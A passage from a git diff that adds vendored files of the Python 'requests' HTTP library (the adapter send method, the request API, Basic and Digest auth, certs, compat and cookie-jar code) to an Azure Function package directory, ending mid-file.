request: The :class:`PreparedRequest ` being sent. + :param stream: (optional) Whether to stream the request content. + :param timeout: (optional) How long to wait for the server to send + data before giving up, as a float, or a :ref:`(connect timeout, + read timeout) ` tuple. + :type timeout: float or tuple or urllib3 Timeout object + :param verify: (optional) Either a boolean, in which case it controls whether + we verify the server's TLS certificate, or a string, in which case it + must be a path to a CA bundle to use + :param cert: (optional) Any user-provided SSL certificate to be trusted. + :param proxies: (optional) The proxies dictionary to apply to the request. + :rtype: requests.Response + """ + + try: + conn = self.get_connection(request.url, proxies) + except LocationValueError as e: + raise InvalidURL(e, request=request) + + self.cert_verify(conn, request.url, verify, cert) + url = self.request_url(request, proxies) + self.add_headers( + request, + stream=stream, + timeout=timeout, + verify=verify, + cert=cert, + proxies=proxies, + ) + + chunked = not (request.body is None or "Content-Length" in request.headers) + + if isinstance(timeout, tuple): + try: + connect, read = timeout + timeout = TimeoutSauce(connect=connect, read=read) + except ValueError: + raise ValueError( + f"Invalid timeout {timeout}. Pass a (connect, read) timeout tuple, " + f"or a single float to set both timeouts to the same value." + ) + elif isinstance(timeout, TimeoutSauce): + pass + else: + timeout = TimeoutSauce(connect=timeout, read=timeout) + + try: + if not chunked: + resp = conn.urlopen( + method=request.method, + url=url, + body=request.body, + headers=request.headers, + redirect=False, + assert_same_host=False, + preload_content=False, + decode_content=False, + retries=self.max_retries, + timeout=timeout, + ) + + # Send the request. + else: + if hasattr(conn, "proxy_pool"): + conn = conn.proxy_pool + + low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT) + + try: + skip_host = "Host" in request.headers + low_conn.putrequest( + request.method, + url, + skip_accept_encoding=True, + skip_host=skip_host, + ) + + for header, value in request.headers.items(): + low_conn.putheader(header, value) + + low_conn.endheaders() + + for i in request.body: + low_conn.send(hex(len(i))[2:].encode("utf-8")) + low_conn.send(b"\r\n") + low_conn.send(i) + low_conn.send(b"\r\n") + low_conn.send(b"0\r\n\r\n") + + # Receive the response from the server + r = low_conn.getresponse() + + resp = HTTPResponse.from_httplib( + r, + pool=conn, + connection=low_conn, + preload_content=False, + decode_content=False, + ) + except Exception: + # If we hit any problems here, clean up the connection. + # Then, raise so that we can handle the actual exception. + low_conn.close() + raise + + except (ProtocolError, OSError) as err: + raise ConnectionError(err, request=request) + + except MaxRetryError as e: + if isinstance(e.reason, ConnectTimeoutError): + # TODO: Remove this in 3.0.0: see #2811 + if not isinstance(e.reason, NewConnectionError): + raise ConnectTimeout(e, request=request) + + if isinstance(e.reason, ResponseError): + raise RetryError(e, request=request) + + if isinstance(e.reason, _ProxyError): + raise ProxyError(e, request=request) + + if isinstance(e.reason, _SSLError): + # This branch is for urllib3 v1.22 and later. + raise SSLError(e, request=request) + + raise ConnectionError(e, request=request) + + except ClosedPoolError as e: + raise ConnectionError(e, request=request) + + except _ProxyError as e: + raise ProxyError(e) + + except (_SSLError, _HTTPError) as e: + if isinstance(e, _SSLError): + # This branch is for urllib3 versions earlier than v1.22 + raise SSLError(e, request=request) + elif isinstance(e, ReadTimeoutError): + raise ReadTimeout(e, request=request) + elif isinstance(e, _InvalidHeader): + raise InvalidHeader(e, request=request) + else: + raise + + return self.build_response(request, resp) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/api.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/api.py new file mode 100644 index 0000000..3341361 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/api.py @@ -0,0 +1,157 @@ +""" +requests.api +~~~~~~~~~~~~ + +This module implements the Requests API. + +:copyright: (c) 2012 by Kenneth Reitz. +:license: Apache2, see LICENSE for more details. +""" + +from . import sessions + + +def request(method, url, **kwargs): + """Constructs and sends a :class:`Request `. + + :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``. + :param url: URL for the new :class:`Request` object. + :param params: (optional) Dictionary, list of tuples or bytes to send + in the query string for the :class:`Request`. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. + :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. + :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. + :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload. + ``file-tuple`` can be a 2-tuple ``('filename', fileobj)``, 3-tuple ``('filename', fileobj, 'content_type')`` + or a 4-tuple ``('filename', fileobj, 'content_type', custom_headers)``, where ``'content-type'`` is a string + defining the content type of the given file and ``custom_headers`` a dict-like object containing additional headers + to add for the file. + :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. + :param timeout: (optional) How many seconds to wait for the server to send data + before giving up, as a float, or a :ref:`(connect timeout, read + timeout) ` tuple. + :type timeout: float or tuple + :param allow_redirects: (optional) Boolean. Enable/disable GET/OPTIONS/POST/PUT/PATCH/DELETE/HEAD redirection. Defaults to ``True``. + :type allow_redirects: bool + :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. + :param verify: (optional) Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use. Defaults to ``True``. + :param stream: (optional) if ``False``, the response content will be immediately downloaded. + :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. + :return: :class:`Response ` object + :rtype: requests.Response + + Usage:: + + >>> import requests + >>> req = requests.request('GET', 'https://httpbin.org/get') + >>> req + + """ + + # By using the 'with' statement we are sure the session is closed, thus we + # avoid leaving sockets open which can trigger a ResourceWarning in some + # cases, and look like a memory leak in others. + with sessions.Session() as session: + return session.request(method=method, url=url, **kwargs) + + +def get(url, params=None, **kwargs): + r"""Sends a GET request. + + :param url: URL for the new :class:`Request` object. + :param params: (optional) Dictionary, list of tuples or bytes to send + in the query string for the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("get", url, params=params, **kwargs) + + +def options(url, **kwargs): + r"""Sends an OPTIONS request. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("options", url, **kwargs) + + +def head(url, **kwargs): + r"""Sends a HEAD request. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. If + `allow_redirects` is not provided, it will be set to `False` (as + opposed to the default :meth:`request` behavior). + :return: :class:`Response ` object + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", False) + return request("head", url, **kwargs) + + +def post(url, data=None, json=None, **kwargs): + r"""Sends a POST request. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json data to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("post", url, data=data, json=json, **kwargs) + + +def put(url, data=None, **kwargs): + r"""Sends a PUT request. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json data to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("put", url, data=data, **kwargs) + + +def patch(url, data=None, **kwargs): + r"""Sends a PATCH request. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json data to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("patch", url, data=data, **kwargs) + + +def delete(url, **kwargs): + r"""Sends a DELETE request. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("delete", url, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/auth.py new file mode 100644 index 0000000..bba117e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/auth.py @@ -0,0 +1,315 @@ +""" +requests.auth +~~~~~~~~~~~~~ + +This module contains the authentication handlers for Requests. +""" + +import hashlib +import os +import re +import threading +import time +import warnings +from base64 import b64encode + +from ._internal_utils import to_native_string +from .compat import basestring, str, urlparse +from .cookies import extract_cookies_to_jar +from .utils import parse_dict_header + +CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded" +CONTENT_TYPE_MULTI_PART = "multipart/form-data" + + +def _basic_auth_str(username, password): + """Returns a Basic Auth string.""" + + # "I want us to put a big-ol' comment on top of it that + # says that this behaviour is dumb but we need to preserve + # it because people are relying on it." + # - Lukasa + # + # These are here solely to maintain backwards compatibility + # for things like ints. This will be removed in 3.0.0. + if not isinstance(username, basestring): + warnings.warn( + "Non-string usernames will no longer be supported in Requests " + "3.0.0. Please convert the object you've passed in ({!r}) to " + "a string or bytes object in the near future to avoid " + "problems.".format(username), + category=DeprecationWarning, + ) + username = str(username) + + if not isinstance(password, basestring): + warnings.warn( + "Non-string passwords will no longer be supported in Requests " + "3.0.0. Please convert the object you've passed in ({!r}) to " + "a string or bytes object in the near future to avoid " + "problems.".format(type(password)), + category=DeprecationWarning, + ) + password = str(password) + # -- End Removal -- + + if isinstance(username, str): + username = username.encode("latin1") + + if isinstance(password, str): + password = password.encode("latin1") + + authstr = "Basic " + to_native_string( + b64encode(b":".join((username, password))).strip() + ) + + return authstr + + +class AuthBase: + """Base class that all auth implementations derive from""" + + def __call__(self, r): + raise NotImplementedError("Auth hooks must be callable.") + + +class HTTPBasicAuth(AuthBase): + """Attaches HTTP Basic Authentication to the given Request object.""" + + def __init__(self, username, password): + self.username = username + self.password = password + + def __eq__(self, other): + return all( + [ + self.username == getattr(other, "username", None), + self.password == getattr(other, "password", None), + ] + ) + + def __ne__(self, other): + return not self == other + + def __call__(self, r): + r.headers["Authorization"] = _basic_auth_str(self.username, self.password) + return r + + +class HTTPProxyAuth(HTTPBasicAuth): + """Attaches HTTP Proxy Authentication to a given Request object.""" + + def __call__(self, r): + r.headers["Proxy-Authorization"] = _basic_auth_str(self.username, self.password) + return r + + +class HTTPDigestAuth(AuthBase): + """Attaches HTTP Digest Authentication to the given Request object.""" + + def __init__(self, username, password): + self.username = username + self.password = password + # Keep state in per-thread local storage + self._thread_local = threading.local() + + def init_per_thread_state(self): + # Ensure state is initialized just once per-thread + if not hasattr(self._thread_local, "init"): + self._thread_local.init = True + self._thread_local.last_nonce = "" + self._thread_local.nonce_count = 0 + self._thread_local.chal = {} + self._thread_local.pos = None + self._thread_local.num_401_calls = None + + def build_digest_header(self, method, url): + """ + :rtype: str + """ + + realm = self._thread_local.chal["realm"] + nonce = self._thread_local.chal["nonce"] + qop = self._thread_local.chal.get("qop") + algorithm = self._thread_local.chal.get("algorithm") + opaque = self._thread_local.chal.get("opaque") + hash_utf8 = None + + if algorithm is None: + _algorithm = "MD5" + else: + _algorithm = algorithm.upper() + # lambdas assume digest modules are imported at the top level + if _algorithm == "MD5" or _algorithm == "MD5-SESS": + + def md5_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.md5(x).hexdigest() + + hash_utf8 = md5_utf8 + elif _algorithm == "SHA": + + def sha_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.sha1(x).hexdigest() + + hash_utf8 = sha_utf8 + elif _algorithm == "SHA-256": + + def sha256_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.sha256(x).hexdigest() + + hash_utf8 = sha256_utf8 + elif _algorithm == "SHA-512": + + def sha512_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.sha512(x).hexdigest() + + hash_utf8 = sha512_utf8 + + KD = lambda s, d: hash_utf8(f"{s}:{d}") # noqa:E731 + + if hash_utf8 is None: + return None + + # XXX not implemented yet + entdig = None + p_parsed = urlparse(url) + #: path is request-uri defined in RFC 2616 which should not be empty + path = p_parsed.path or "/" + if p_parsed.query: + path += f"?{p_parsed.query}" + + A1 = f"{self.username}:{realm}:{self.password}" + A2 = f"{method}:{path}" + + HA1 = hash_utf8(A1) + HA2 = hash_utf8(A2) + + if nonce == self._thread_local.last_nonce: + self._thread_local.nonce_count += 1 + else: + self._thread_local.nonce_count = 1 + ncvalue = f"{self._thread_local.nonce_count:08x}" + s = str(self._thread_local.nonce_count).encode("utf-8") + s += nonce.encode("utf-8") + s += time.ctime().encode("utf-8") + s += os.urandom(8) + + cnonce = hashlib.sha1(s).hexdigest()[:16] + if _algorithm == "MD5-SESS": + HA1 = hash_utf8(f"{HA1}:{nonce}:{cnonce}") + + if not qop: + respdig = KD(HA1, f"{nonce}:{HA2}") + elif qop == "auth" or "auth" in qop.split(","): + noncebit = f"{nonce}:{ncvalue}:{cnonce}:auth:{HA2}" + respdig = KD(HA1, noncebit) + else: + # XXX handle auth-int. + return None + + self._thread_local.last_nonce = nonce + + # XXX should the partial digests be encoded too? + base = ( + f'username="{self.username}", realm="{realm}", nonce="{nonce}", ' + f'uri="{path}", response="{respdig}"' + ) + if opaque: + base += f', opaque="{opaque}"' + if algorithm: + base += f', algorithm="{algorithm}"' + if entdig: + base += f', digest="{entdig}"' + if qop: + base += f', qop="auth", nc={ncvalue}, cnonce="{cnonce}"' + + return f"Digest {base}" + + def handle_redirect(self, r, **kwargs): + """Reset num_401_calls counter on redirects.""" + if r.is_redirect: + self._thread_local.num_401_calls = 1 + + def handle_401(self, r, **kwargs): + """ + Takes the given response and tries digest-auth, if needed. + + :rtype: requests.Response + """ + + # If response is not 4xx, do not auth + # See https://github.com/psf/requests/issues/3772 + if not 400 <= r.status_code < 500: + self._thread_local.num_401_calls = 1 + return r + + if self._thread_local.pos is not None: + # Rewind the file position indicator of the body to where + # it was to resend the request. + r.request.body.seek(self._thread_local.pos) + s_auth = r.headers.get("www-authenticate", "") + + if "digest" in s_auth.lower() and self._thread_local.num_401_calls < 2: + + self._thread_local.num_401_calls += 1 + pat = re.compile(r"digest ", flags=re.IGNORECASE) + self._thread_local.chal = parse_dict_header(pat.sub("", s_auth, count=1)) + + # Consume content and release the original connection + # to allow our new request to reuse the same one. + r.content + r.close() + prep = r.request.copy() + extract_cookies_to_jar(prep._cookies, r.request, r.raw) + prep.prepare_cookies(prep._cookies) + + prep.headers["Authorization"] = self.build_digest_header( + prep.method, prep.url + ) + _r = r.connection.send(prep, **kwargs) + _r.history.append(r) + _r.request = prep + + return _r + + self._thread_local.num_401_calls = 1 + return r + + def __call__(self, r): + # Initialize per-thread state, if needed + self.init_per_thread_state() + # If we have a saved nonce, skip the 401 + if self._thread_local.last_nonce: + r.headers["Authorization"] = self.build_digest_header(r.method, r.url) + try: + self._thread_local.pos = r.body.tell() + except AttributeError: + # In the case of HTTPDigestAuth being reused and the body of + # the previous request was a file-like object, pos has the + # file position of the previous body. Ensure it's set to + # None. + self._thread_local.pos = None + r.register_hook("response", self.handle_401) + r.register_hook("response", self.handle_redirect) + self._thread_local.num_401_calls = 1 + + return r + + def __eq__(self, other): + return all( + [ + self.username == getattr(other, "username", None), + self.password == getattr(other, "password", None), + ] + ) + + def __ne__(self, other): + return not self == other diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/certs.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/certs.py new file mode 100644 index 0000000..34e177f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/certs.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python + +""" +requests.certs +~~~~~~~~~~~~~~ + +This module returns the preferred default CA certificate bundle. There is +only one — the one from the certifi package. + +If you are packaging Requests, e.g., for a Linux distribution or a managed +environment, you can change the definition of where() to return a separately +packaged CA bundle. +""" +from certifi import where + +if __name__ == "__main__": + print(where()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/compat.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/compat.py new file mode 100644 index 0000000..b0f3f30 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/compat.py @@ -0,0 +1,79 @@ +""" +requests.compat +~~~~~~~~~~~~~~~ + +This module previously handled import compatibility issues +between Python 2 and Python 3. It remains for backwards +compatibility until the next major version. +""" + +try: + import chardet +except ImportError: + import charset_normalizer as chardet + +import sys + +# ------- +# Pythons +# ------- + +# Syntax sugar. +_ver = sys.version_info + +#: Python 2.x? +is_py2 = _ver[0] == 2 + +#: Python 3.x? +is_py3 = _ver[0] == 3 + +# json/simplejson module import resolution +has_simplejson = False +try: + import simplejson as json + + has_simplejson = True +except ImportError: + import json + +if has_simplejson: + from simplejson import JSONDecodeError +else: + from json import JSONDecodeError + +# Keep OrderedDict for backwards compatibility. +from collections import OrderedDict +from collections.abc import Callable, Mapping, MutableMapping +from http import cookiejar as cookielib +from http.cookies import Morsel +from io import StringIO + +# -------------- +# Legacy Imports +# -------------- +from urllib.parse import ( + quote, + quote_plus, + unquote, + unquote_plus, + urldefrag, + urlencode, + urljoin, + urlparse, + urlsplit, + urlunparse, +) +from urllib.request import ( + getproxies, + getproxies_environment, + parse_http_list, + proxy_bypass, + proxy_bypass_environment, +) + +builtin_str = str +str = str +bytes = bytes +basestring = (str, bytes) +numeric_types = (int, float) +integer_types = (int,) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/cookies.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/cookies.py new file mode 100644 index 0000000..ebecc89 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/cookies.py @@ -0,0 +1,561 @@ +""" +requests.cookies +~~~~~~~~~~~~~~~~ + +Compatibility code to be able to use `cookielib.CookieJar` with requests. + +requests.utils imports from here, so be careful with imports. +""" + +import calendar +import copy +import time + +from ._internal_utils import to_native_string +from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse + +try: + import threading +except ImportError: + import dummy_threading as threading + + +class MockRequest: + """Wraps a `requests.Request` to mimic a `urllib2.Request`. + + The code in `cookielib.CookieJar` expects this interface in order to correctly + manage cookie policies, i.e., determine whether a cookie can be set, given the + domains of the request and the cookie. + + The original request object is read-only. The client is responsible for collecting + the new headers via `get_new_headers()` and interpreting them appropriately. You + probably want `get_cookie_header`, defined below. + """ + + def __init__(self, request): + self._r = request + self._new_headers = {} + self.type = urlparse(self._r.url).scheme + + def get_type(self): + return self.type + + def get_host(self): + return urlparse(self._r.url).netloc + + def get_origin_req_host(self): + return self.get_host() + + def get_full_url(self): + # Only return the response's URL if the user hadn't set the Host + # header + if not self._r.headers.get("Host"): + return self._r.url + # If they did set it, retrieve it and reconstruct the expected domain + host = to_native_string(self._r.headers["Host"], encoding="utf-8") + parsed = urlparse(self._r.url) + # Reconstruct the URL as we expect it + return urlunparse( + [ + parsed.scheme, + host, + parsed.path, + parsed.params, + parsed.query, + parsed.fragment, + ] + ) + + def is_unverifiable(self): + return True + + def has_header(self, name): + return name in self._r.headers or name in self._new_headers + + def get_header(self, name, default=None): + return self._r.headers.get(name, self._new_headers.get(name, default)) + + def add_header(self, key, val): + """cookielib has no legitimate use for this method; add it back if you find one.""" + raise NotImplementedError( + "Cookie headers should be added with add_unredirected_header()" + ) + + def add_unredirected_header(self, name, value): + self._new_headers[name] = value + + def get_new_headers(self): + return self._new_headers + + @property + def unverifiable(self): + return self.is_unverifiable() + + @property + def origin_req_host(self): + return self.get_origin_req_host() + + @property + def host(self): + return self.get_host() + + +class MockResponse: + """Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`. + + ...what? Basically, expose the parsed HTTP headers from the server response + the way `cookielib` expects to see them. + """ + + def __init__(self, headers): + """Make a MockResponse for `cookielib` to read. + + :param headers: a httplib.HTTPMessage or analogous carrying the headers + """ + self._headers = headers + + def info(self): + return self._headers + + def getheaders(self, name): + self._headers.getheaders(name) + + +def extract_cookies_to_jar(jar, request, response): + """Extract the cookies from the response into a CookieJar. + + :param jar: cookielib.CookieJar (not necessarily a RequestsCookieJar) + :param request: our own requests.Request object + :param response: urllib3.HTTPResponse object + """ + if not (hasattr(response, "_original_response") and response._original_response): + return + # the _original_response field is the wrapped httplib.HTTPResponse object, + req = MockRequest(request) + # pull out the HTTPMessage with the headers and put it in the mock: + res = MockResponse(response._original_response.msg) + jar.extract_cookies(res, req) + + +def get_cookie_header(jar, request): + """ + Produce an appropriate Cookie header string to be sent with `request`, or None. + + :rtype: str + """ + r = MockRequest(request) + jar.add_cookie_header(r) + return r.get_new_headers().get("Cookie") + + +def remove_cookie_by_name(cookiejar, name, domain=None, path=None): + """Unsets a cookie by name, by default over all domains and paths. + + Wraps CookieJar.clear(), is O(n). + """ + clearables = [] + for cookie in cookiejar: + if cookie.name != name: + continue + if domain is not None and domain != cookie.domain: + continue + if path is not None and path != cookie.path: + continue + clearables.append((cookie.domain, cookie.path, cookie.name)) + + for domain, path, name in clearables: + cookiejar.clear(domain, path, name) + + +class CookieConflictError(RuntimeError): + """There are two cookies that meet the criteria specified in the cookie jar. + Use .get and .set and include domain and path args in order to be more specific. + """ + + +class RequestsCookieJar(cookielib.CookieJar, MutableMapping): + """Compatibility class; is a cookielib.CookieJar, but exposes a dict + interface. + + This is the CookieJar we create by default for requests and sessions that + don't specify one, since some clients may expect response.cookies and + session.cookies to support dict operations. + + Requests does not use the dict interface internally; it's just for + compatibility with external client code. All requests code should work + out of the box with externally provided instances of ``CookieJar``, e.g. + ``LWPCookieJar`` and ``FileCookieJar``. + + Unlike a regular CookieJar, this class is pickleable. + + .. warning:: dictionary operations that are normally O(1) may be O(n). + """ + + def get(self, name, default=None, domain=None, path=None): + """Dict-like get() that also supports optional domain and path args in + order to resolve naming collisions from using one cookie jar over + multiple domains. + + .. warning:: operation is O(n), not O(1). + """ + try: + return self._find_no_duplicates(name, domain, path) + except KeyError: + return default + + def set(self, name, value, **kwargs): + """Dict-like set() that also supports optional domain and path args in + order to resolve naming collisions from using one cookie jar over + multiple domains. + """ + # support client code that unsets cookies by assignment of a None value: + if value is None: + remove_cookie_by_name( + self, name, domain=kwargs.get("domain"), path=kwargs.get("path") + ) + return + + if isinstance(value, Morsel): + c = morsel_to_cookie(value) + else: + c = create_cookie(name, value, **kwargs) + self.set_cookie(c) + return c + + def iterkeys(self): + """Dict-like iterkeys() that returns an iterator of names of cookies + from the jar. + + .. seealso:: itervalues() and iteritems(). + """ + for cookie in iter(self): + yield cookie.name + + def keys(self): + """Dict-like keys() that returns a list of names of cookies from the + jar. + + .. seealso:: values() and items(). + """ + return list(self.iterkeys()) + + def itervalues(self): + """Dict-like itervalues() that returns an iterator of values of cookies + from the jar. + + .. seealso:: iterkeys() and iteritems(). + """ + for cookie in iter(self): + yield cookie.value + + def values(self): + """Dict-like values() that returns a list of values of cookies from the + jar. + + .. seealso:: keys() and items(). + """ + return list(self.itervalues()) + + def iteritems(self): + """Dict-like iteritems() that returns an iterator of name-value tuples + from the jar. + + .. seealso:: iterkeys() and itervalues(). + """ + for cookie in iter(self): + yield cookie.name, cookie.value + + def items(self): + """Dict-like items() that returns a list of name-value tuples from the + jar. Allows client-code to call ``dict(RequestsCookieJar)`` and get a + vanilla python dict of key value pairs. + + .. seealso:: keys() and values(). + """ + return list(self.iteritems()) + + def list_domains(self): + """Utility method to list all the domains in the jar.""" + domains = [] + for cookie in iter(self): + if cookie.domain not in domains: + domains.append(cookie.domain) + return domains + + def list_paths(self): + """Utility method to list all the paths in the jar.""" + paths = [] + for cookie in iter(self): + if cookie.path not in paths: + paths.append(cookie.path) + return paths + + def multiple_domains(self): + """Returns True if there are multiple domains in the jar. + Returns False otherwise. + + :rtype: bool + """ + domains = [] + for cookie in iter(self): + if cookie.domain is not None and cookie.domain in domains: + return True + domains.append(cookie.domain) + return False # there is only one domain in jar + + def get_dict(self, domain=None, path=None): + """Takes as an argument an optional domain and path and returns a plain + old Python dict of name-value pairs of cookies that meet the + requirements. + + :rtype: dict + """ + dictionary = {} + for cookie in iter(self): + if (domain is None or cookie.domain == domain) and ( + path is None or cookie.path == path + ): + dictionary[cookie.name] = cookie.value + return dictionary + + def __contains__(self, name): + try: + return super().__contains__(name) + except CookieConflictError: + return True + + def __getitem__(self, name): + """Dict-like __getitem__() for compatibility with client code. Throws + exception if there are more than one cookie with name. In that case, + use the more explicit get() method instead. + + .. warning:: operation is O(n), not O(1). + """ + return self._find_no_duplicates(name) + + def __setitem__(self, name, value): + """Dict-like __setitem__ for compatibility with client code. Throws + exception if there is already a cookie of that name in the jar. In that + case, use the more explicit set() method instead. + """ + self.set(name, value) + + def __delitem__(self, name): + """Deletes a cookie given a name. Wraps ``cookielib.CookieJar``'s + ``remove_cookie_by_name()``. + """ + remove_cookie_by_name(self, name) + + def set_cookie(self, cookie, *args, **kwargs): + if ( + hasattr(cookie.value, "startswith") + and cookie.value.startswith('"') + and cookie.value.endswith('"') + ): + cookie.value = cookie.value.replace('\\"', "") + return super().set_cookie(cookie, *args, **kwargs) + + def update(self, other): + """Updates this jar with cookies from another CookieJar or dict-like""" + if isinstance(other, cookielib.CookieJar): + for cookie in other: + self.set_cookie(copy.copy(cookie)) + else: + super().update(other) + + def _find(self, name, domain=None, path=None): + """Requests uses this method internally to get cookie values. + + If there are conflicting cookies, _find arbitrarily chooses one. + See _find_no_duplicates if you want an exception thrown if there are + conflicting cookies. + + :param name: a string containing name of cookie + :param domain: (optional) string containing domain of cookie + :param path: (optional) string containing path of cookie + :return: cookie.value + """ + for cookie in iter(self): + if cookie.name == name: + if domain is None or cookie.domain == domain: + if path is None or cookie.path == path: + return cookie.value + + raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") + + def _find_no_duplicates(self, name, domain=None, path=None): + """Both ``__get_item__`` and ``get`` call this function: it's never + used elsewhere in Requests. + + :param name: a string containing name of cookie + :param domain: (optional) string containing domain of cookie + :param path: (optional) string containing path of cookie + :raises KeyError: if cookie is not found + :raises CookieConflictError: if there are multiple cookies + that match name and optionally domain and path + :return: cookie.value + """ + toReturn = None + for cookie in iter(self): + if cookie.name == name: + if domain is None or cookie.domain == domain: + if path is None or cookie.path == path: + if toReturn is not None: + # if there are multiple cookies that meet passed in criteria + raise CookieConflictError( + f"There are multiple cookies with name, {name!r}" + ) + # we will eventually return this as long as no cookie conflict + toReturn = cookie.value + + if toReturn: + return toReturn + raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") + + def __getstate__(self): + """Unlike a normal CookieJar, this class is pickleable.""" + state = self.__dict__.copy() + # remove the unpickleable RLock object + state.pop("_cookies_lock") + return state + + def __setstate__(self, state): + """Unlike a normal CookieJar, this class is pickleable.""" + self.__dict__.update(state) + if "_cookies_lock" not in self.__dict__: + self._cookies_lock = threading.RLock() + + def copy(self): + """Return a copy of this RequestsCookieJar.""" + new_cj = RequestsCookieJar() + new_cj.set_policy(self.get_policy()) + new_cj.update(self) + return new_cj + + def get_policy(self): + """Return the CookiePolicy instance used.""" + return self._policy + + +def _copy_cookie_jar(jar): + if jar is None: + return None + + if hasattr(jar, "copy"): + # We're dealing with an instance of RequestsCookieJar + return jar.copy() + # We're dealing with a generic CookieJar instance + new_jar = copy.copy(jar) + new_jar.clear() + for cookie in jar: + new_jar.set_cookie(copy.copy(cookie)) + return new_jar + + +def create_cookie(name, value, **kwargs): + """Make a cookie from underspecified parameters. + + By default, the pair of `name` and `value` will be set for the domain '' + and sent on every request (this is sometimes called a "supercookie"). + """ + result = { + "version": 0, + "name": name, + "value": value, + "port": None, + "domain": "", + "path": "/", + "secure": False, + "expires": None, + "discard": True, + "comment": None, + "comment_url": None, + "rest": {"HttpOnly": None}, + "rfc2109": False, + } + + badargs = set(kwargs) - set(result) + if badargs: + raise TypeError( + f"create_cookie() got unexpected keyword arguments: {list(badargs)}" + ) + + result.update(kwargs) + result["port_specified"] = bool(result["port"]) + result["domain_specified"] = bool(result["domain"]) + result["domain_initial_dot"] = result["domain"].startswith(".") + result["path_specified"] = bool(result["path"]) + + return cookielib.Cookie(**result) + + +def morsel_to_cookie(morsel): + """Convert a Morsel object into a Cookie containing the one k/v pair.""" + + expires = None + if morsel["max-age"]: + try: + expires = int(time.time() + int(morsel["max-age"])) + except ValueError: + raise TypeError(f"max-age: {morsel['max-age']} must be integer") + elif morsel["expires"]: + time_template = "%a, %d-%b-%Y %H:%M:%S GMT" + expires = calendar.timegm(time.strptime(morsel["expires"], time_template)) + return create_cookie( + comment=morsel["comment"], + comment_url=bool(morsel["comment"]), + discard=False, + domain=morsel["domain"], + expires=expires, + name=morsel.key, + path=morsel["path"], + port=None, + rest={"HttpOnly": morsel["httponly"]}, + rfc2109=False, + secure=bool(morsel["secure"]), + value=morsel.value, + version=morsel["version"] or 0, + ) + + +def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True): + """Returns a CookieJar from a key/value dictionary. + + :param cookie_dict: Dict of key/values to insert into CookieJar. + :param cookiejar: (optional) A cookiejar to add the cookies to. + :param overwrite: (optional) If False, will not replace cookies + already in the jar with new ones. + :rtype: CookieJar + """ + if cookiejar is None: + cookiejar = RequestsCookieJar() + + if cookie_dict is not None: + names_from_jar = [cookie.name for cookie in cookiejar] + for name in cookie_dict: + if overwrite or (name not in names_from_jar): + cookiejar.set_cookie(create_cookie(name, 